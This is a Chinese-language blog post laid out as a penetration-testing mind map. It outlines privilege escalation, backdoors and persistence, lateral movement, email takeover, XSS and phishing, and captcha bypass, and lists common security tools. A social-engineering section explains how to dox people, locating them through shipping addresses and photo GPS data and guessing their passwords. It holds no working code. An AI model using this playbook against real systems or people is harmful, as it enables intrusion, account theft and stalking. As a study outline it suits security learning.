<li><p>一般情况</p>
<ul>
<li>pr 、Churrasco、kelong、IIS6up、mimikatz、第三方cmd、第三方net、vbs、读hash、msf</li>
</ul>
</li>
<li><p>找未安装补丁的提权漏洞</p>
</li>
<li><p>通过高权应用的RCE 或 LCE提权，如：mssql、Oracle</p>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits">https://github.com/SecWiki/windows-kernel-exploits</a></li>
</ul>
</li>
</ul>
</li>
<li><p>Linux</p>
<ul>
<li><p>通过高权应用</p>
</li>
<li><p>根据内核版本找exp</p>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/SecWiki/linux-kernel-exploits">https://github.com/SecWiki/linux-kernel-exploits</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>维持</p>
<ul>
<li><p>信息收集</p>
<ul>
<li>保存用户bash history</li>
<li>netstat -an 查看端口连接情况</li>
<li>/etc/passwd /etc/shadow 用户相关信息</li>
<li>crontab 里的定时任务</li>
<li>系统变量</li>
<li>lastlog &amp; last  &amp; who /var/log/wtmp 分析登录频次</li>
<li>用户根目录的文件</li>
<li>/etc/hosts 中的映射</li>
<li>/.ssh/</li>
<li>查看数据库SQL日志</li>
<li>查看WEB服务运行日志</li>
</ul>
</li>
<li><p>后门</p>
<ul>
<li>shift 后门</li>
<li>Windows $ 隐藏用户</li>
<li>开机自启执行后门</li>
<li>替换带有后门的敏感程序 如：ssh / mstsc</li>
<li>注册表</li>
<li>dll 劫持</li>
<li>开启代理</li>
</ul>
</li>
</ul>
</li>
<li><p>待补充</p>
</li>
</ul>
<h3 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h3><ul>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/Ridter/Intranet_Penetration_Tips">https://github.com/Ridter/Intranet_Penetration_Tips</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/l3m0n/pentest_study">https://github.com/l3m0n/pentest_study</a></li>
</ul>
</li>
<li><p>待补充</p>
</li>
</ul>
<h3 id="持续渗透和一些技巧"><a href="#持续渗透和一些技巧" class="headerlink" title="持续渗透和一些技巧"></a>持续渗透和一些技巧</h3><ul>
<li><p>得到子服务器权限后</p>
<ul>
<li>探测内网存活主机/服务 的指纹信息</li>
<li>ARP劫持流量</li>
<li>找到该服务器与其他服务器的关联（如：已得到redis服务器权限  web服务器会从redis中取出数据反序列化 则可以篡改redis中的数据以获取web服务器权限）</li>
</ul>
</li>
<li><p>得到域名解析权后</p>
<ul>
<li>指向到反代至目标的服务器，记录GET POST请求日志，分析特殊URL和登录后台的POST 请求</li>
</ul>
</li>
<li><p>找到XSS后</p>
<ul>
<li>如果是社交类网站，尝试寻找CSRF制造蠕虫</li>
<li>通过其他社交网站的JSONP漏洞，探测管理员的个人信息</li>
<li>打到管理员cookie后通过附带 Cookie 不断请求后台以保持会话不被销毁</li>
<li>根据浏览器、flash、等情况进行浏览器攻击。如：执行代码、种rootkit</li>
<li>canvas 截图页面</li>
</ul>
</li>
<li><p>得到邮箱地址后</p>
<ul>
<li><p>独立邮件系统可找公开漏洞攻击</p>
</li>
<li><p>发送测试邮件探测对方使用邮箱系统</p>
<ul>
<li>通过挖掘相关邮箱系统漏洞进行攻击</li>
</ul>
</li>
<li><p>找到服务器、CDN、域名、DNS等服务商，伪造钓鱼邮件欺骗管理员登录</p>
</li>
<li><p>发送含有后门的附件（如：pdf、Excel、word、rar的代码执行漏洞）</p>
</li>
<li><p>通过社工库或搜索引擎人肉搜索得出密码后尝试登陆邮箱</p>
</li>
</ul>
</li>
<li><p>得到邮箱权限后</p>
<ul>
<li><p>分析/劫持邮箱收信</p>
</li>
<li><p>个人邮箱</p>
<ul>
<li><p>搜搜：password、找回密码、重置密码、忘记密码等关键字</p>
</li>
<li><p>找服务器、CDN、域名、DNS等服务商的邮件，如果无法登陆尝试重置等操作</p>
</li>
<li><p>找到有关地理位置软件的邮件</p>
<ul>
<li>淘宝（收货地址）</li>
<li>京东（收货地址）</li>
<li>支付宝（收货地址）</li>
<li>Apple账号（可定位）</li>
<li>各手机大厂（手机定位）</li>
<li>找发件箱中的原始图片（找exif的GPS定位）</li>
</ul>
</li>
<li><p>…</p>
</li>
</ul>
</li>
<li><p>企业邮箱</p>
<ul>
<li>找VPN相关邮件 可内网渗透</li>
<li>找OA,ERP,SCM,CRM,BRP,OMS,WMS相关系统邮件</li>
<li>找Git,SVN,自动化测试相关邮件</li>
<li>搜索关键字：password、密码、192、172、10. 等关键字</li>
<li>…</li>
</ul>
</li>
</ul>
</li>
<li><p>引入了外部资源</p>
<ul>
<li>搞定外部网站</li>
<li>如果是JS 可以考虑XSS攻击</li>
<li>IMG LINK 可以401认证钓鱼</li>
<li>IFRAME bgsound EMBED source object等可以挂可执行文件或跳转钓鱼页</li>
</ul>
</li>
<li><p>找后台</p>
<ul>
<li><p>一般在后台添加友联时会展示logo图片，如果可以填写远程URL 可以尝试和站长沟通交换友联，添加成功后，对方则会发起一个refer为后台的请求到你的LOGO</p>
</li>
<li><p>收集网站名简写、英文名、邮箱前缀等 于 admin、manage、system、login等常见单词组合请求</p>
</li>
<li><p>IIS 短文件名漏洞</p>
</li>
<li><p>Windows 下的 &gt;&gt; 特性</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://b1ue.cn/archives/60.html">https://b1ue.cn/archives/60.html</a></li>
</ul>
</li>
<li><p>找列目录漏洞</p>
</li>
<li><p>XSS</p>
</li>
<li><p>收集子域名资产及其C段端口</p>
</li>
<li><p>二级域名 如：admin.xxx.com</p>
</li>
<li><p>google fofa censys等引擎搜索关键字</p>
</li>
<li><p>爬虫爬取所有链接 提取出目录部分 按目录层级穷举</p>
</li>
</ul>
</li>
<li><p>绕过验证码</p>
<ul>
<li>只请求一次验证码，然后用同样的验证码暴力破解</li>
<li>知道验证码在session中的参数，找类似 Tomcat example session重置的漏洞填充同一验证码</li>
<li>云打码平台识别</li>
<li>自己训练OCR识别</li>
</ul>
</li>
</ul>
<h3 id="APT攻击"><a href="#APT攻击" class="headerlink" title="APT攻击"></a>APT攻击</h3><ul>
<li>待补充…</li>
</ul>
<h3 id="流量取证"><a href="#流量取证" class="headerlink" title="流量取证"></a>流量取证</h3><ul>
<li>待补充…</li>
</ul>
<h3 id="社会工程学技巧"><a href="#社会工程学技巧" class="headerlink" title="社会工程学技巧"></a>社会工程学技巧</h3><ul>
<li><p>社交搜索</p>
<ul>
<li><p>查看注册的网站：0xreg reg007</p>
<ul>
<li><p>知道账号去已注册的网站找回密码，可以看到打码后的用户名、邮箱、真实姓名等信息，如果运气好没准能从数据包或html中找到未被打码的信息</p>
</li>
<li><p>可以从这些方面判断用户是否注册过</p>
<ul>
<li><p>找回密码</p>
<ul>
<li>输入账号，如果进入下一步了则该账号存在</li>
</ul>
</li>
<li><p>登录</p>
<ul>
<li>输入账号和密码，如果提示密码错误，则表示该用户已存在</li>
</ul>
</li>
<li><p>注册</p>
<ul>
<li>填写账号时一般网站会去检测该账号是否已存在，如果已存在则会提示不可重复注册</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>知道QQ</p>
<ul>
<li><p>通过QQ邮箱搜索支付宝、淘宝账号</p>
</li>
<li><p>去腾讯微博搜索</p>
</li>
<li><p>通过微信搜索</p>
</li>
<li><p>查看QQ空间</p>
<ul>
<li>通过说说、留言、日志找到其好友</li>
</ul>
</li>
</ul>
</li>
<li><p>知道手机号</p>
<ul>
<li>搜索QQ、微信、钉钉等社交账号</li>
<li>在比较火的一些APP和网站上注册或忘记密码来判断是否注册过账号</li>
<li>查询支付宝账号，尝试输入常见姓氏获取名字</li>
</ul>
</li>
<li><p>通过对方的职业、兴趣找到该领域知名度较高的社交网站反查</p>
</li>
<li><p>根据在QQ空间、朋友圈等动态用百度识图识别照片，在微博、ins、Twitter、fb、百度贴吧搜索相近关键字，按地域、年龄、男女、用户名等筛选</p>
</li>
<li><p>留意社交动态</p>
<ul>
<li>发布时间线</li>
<li>使用什么客户端 iPhone Android还是浏览器</li>
<li>注意每一条链接  / 图片 / 视频</li>
<li>从最早发布的动态看起，会有很大收获</li>
</ul>
</li>
<li><p>一般得到一个账号的密码就相当于得到了其他账号的密码</p>
</li>
<li><p>一般人不同账号的用户名都是相同或相近的</p>
</li>
<li><p>一般人的社交账号头像用的都是一样的</p>
</li>
</ul>
</li>
<li><p>尝试破解社保、公积金账号</p>
<ul>
<li>大部分信息可以用来生成密码字典</li>
</ul>
</li>
<li><p>待补充</p>
</li>
</ul>
<h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><h3 id="扫描工具"><a href="#扫描工具" class="headerlink" title="扫描工具"></a>扫描工具</h3><ul>
<li><p>主动扫描</p>
<ul>
<li><p>AWVS</p>
<ul>
<li>业界知名漏洞扫描器，适用于WEB应用</li>
</ul>
</li>
<li><p>appscan</p>
<ul>
<li>业界知名漏洞扫描器，适用于WEB应用</li>
</ul>
</li>
<li><p>Fuxi Scanner</p>
<ul>
<li>一款聚合了很多功能的综合扫描器</li>
<li><a target="_blank" rel="noopener" href="https://github.com/jeffzh3ng/Fuxi-Scanner">https://github.com/jeffzh3ng/Fuxi-Scanner</a></li>
</ul>
</li>
<li><p>xunfeng</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/ysrc/xunfeng">https://github.com/ysrc/xunfeng</a></li>
<li>一款综合的巡航扫描系统</li>
</ul>
</li>
<li><p>nessus</p>
<ul>
<li>适合扫描系统和应用层漏洞的扫描器</li>
</ul>
</li>
<li><p>sqlmap</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/sqlmapproject/sqlmap">https://github.com/sqlmapproject/sqlmap</a></li>
<li>知名自动化SQL注入神器，安全人员必备</li>
</ul>
</li>
<li><p>masscan</p>
<ul>
<li>快速端口扫描器</li>
</ul>
</li>
</ul>
</li>
<li><p>被动扫描</p>
<ul>
<li><p>GourdScanV2 </p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/ysrc/GourdScanV2">https://github.com/ysrc/GourdScanV2</a></li>
<li>被动式漏洞扫描器</li>
</ul>
</li>
<li><p>SQLiScanner</p>
</li>
<li><p>Burpsuite</p>
<ul>
<li>知名渗透测试工具，安全人员必备</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="渗透框架"><a href="#渗透框架" class="headerlink" title="渗透框架"></a>渗透框架</h3><ul>
<li><p>metasploit</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/rapid7/metasploit-framework">https://github.com/rapid7/metasploit-framework</a></li>
<li>知名漏洞利用框架，安全人员必备</li>
</ul>
</li>
<li><p>pocsuite</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/knownsec/Pocsuite">https://github.com/knownsec/Pocsuite</a></li>
<li>知道创宇的POC漏洞测试框架</li>
</ul>
</li>
<li><p>溯光</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.trackray.cn/">https://www.trackray.cn/</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/iSafeBlue/TrackRay">https://github.com/iSafeBlue/TrackRay</a></li>
<li>我开发的一款在线扫描器+接口式渗透测试框架</li>
</ul>
</li>
<li><p>kunpeng</p>
<ul>
<li>一个兼容多种语言的漏洞框架</li>
</ul>
</li>
<li><p>poc-t</p>
<ul>
<li>python 漏洞验证框架</li>
</ul>
</li>
<li><p>bugscan</p>
<ul>
<li>四叶草的漏洞扫描器</li>
</ul>
</li>
<li><p>3xp10it</p>
</li>
<li><p>pentestbox</p>
<ul>
<li>整合了kali中大部分的安全工具，Windows平台上的神器</li>
</ul>
</li>
<li><p>w9scan</p>
<ul>
<li>w8ay的一款漏洞扫描工具</li>
</ul>
</li>
</ul>
<h3 id="信息收集-1"><a href="#信息收集-1" class="headerlink" title="信息收集"></a>信息收集</h3><ul>
<li><p>wydomain</p>
<ul>
<li>猪猪侠的子域名扫描工具</li>
</ul>
</li>
<li><p>bit4woo/teemo</p>
<ul>
<li>聚合多个接口查子域名</li>
</ul>
</li>
<li><p>ring04h/weakfilescan</p>
<ul>
<li>猪猪侠的信息泄露扫描器</li>
</ul>
</li>
<li><p>ring04h/dirfuzz</p>
<ul>
<li>猪猪侠的网站目录扫描器</li>
</ul>
</li>
<li><p>whatweb</p>
<ul>
<li>网站指纹扫描</li>
</ul>
</li>
<li><p>nsonaniya2010/SubDomainizer</p>
</li>
</ul>
<h3 id="信息泄露"><a href="#信息泄露" class="headerlink" title="信息泄露"></a>信息泄露</h3><ul>
<li><p>lijiejie/GitHack </p>
<ul>
<li>lijiejie的GIT泄露利用</li>
</ul>
</li>
<li><p>shengqi158/svnhack </p>
<ul>
<li>svn泄露利用工具</li>
</ul>
</li>
<li><p>lijiejie/IIS_shortname_Scanner</p>
<ul>
<li>IIS短文件扫描器</li>
</ul>
</li>
</ul>
<h3 id="渗透辅助"><a href="#渗透辅助" class="headerlink" title="渗透辅助"></a>渗透辅助</h3><ul>
<li><p>Cobalt Strike </p>
<ul>
<li>渗透测试工具，安全人员必备</li>
</ul>
</li>
<li><p>hydra</p>
<ul>
<li>多种服务的密码暴力破解工具，安全人员必备</li>
</ul>
</li>
<li><p>nmap</p>
<ul>
<li>端口扫描和系统漏洞扫描的神器，安全人员必备</li>
</ul>
</li>
<li><p>lcx</p>
<ul>
<li>内网转发工具</li>
</ul>
</li>
<li><p>nc</p>
<ul>
<li>常用于shell反弹，安全人员必备</li>
</ul>
</li>
<li><p>proxychain</p>
<ul>
<li>linux下的代理工具</li>
</ul>
</li>
<li><p>reGeorg</p>
<ul>
<li>内网渗透代理工具</li>
</ul>
</li>
<li><p>Proxifier</p>
<ul>
<li>Windows下的代理工具</li>
</ul>
</li>
<li><p>菜刀/蚁剑/Cknife</p>
<ul>
<li>网站webshell管理工具，安全人员必备</li>
</ul>
</li>
</ul>
<p><em>XMind - Trial Version</em></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">xxynly</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://xxynly.xyz/2020/12/23/渗透测试/">http://xxynly.xyz/2020/12/23/渗透测试/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://xxynly.xyz">小夏要努力呀</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/CTF/">CTF</a><a class="post-meta__tags" href="/tags/tools/">tools</a></div><nav id="pagination"><div class="next-post pull-right"><a href="/2020/11/24/%E8%99%9A%E6%8B%9F%E6%9C%BA%E4%B8%8B%E9%80%9A%E8%BF%87Windows-server-2008%E6%90%AD%E5%BB%BAweb%E7%BD%91%E7%AB%99%E3%80%81%E9%82%AE%E4%BB%B6%E3%80%81ftp%E5%B9%B6%E9%80%9A%E8%BF%87ngrok%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E8%BF%9B%E8%A1%8C%E5%A4%96%E7%BD%91%E8%AE%BF%E9%97%AE/"><span>虚拟机下通过Windows server 2008搭建web网站、邮件、ftp并通过Ngrok内网穿透进行外网访问</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="disqus_thread"></div><script>var unused = null;
var disqus_config = function () {
  this.page.url = 'http://xxynly.xyz/2020/12/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/';
  this.page.identifier = '2020/12/23/渗透测试/';
  this.page.title = '渗透测试';
}
var d = document, s = d.createElement('script');
s.src = "https://" + 'xxynly' +".disqus.com/embed.js";
s.setAttribute('data-timestamp', '' + +new Date());
(d.head || d.body).appendChild(s);</script><script id="dsq-count-scr" src="https://xxynly.disqus.com/count.js" async></script></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2020 By xxynly</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>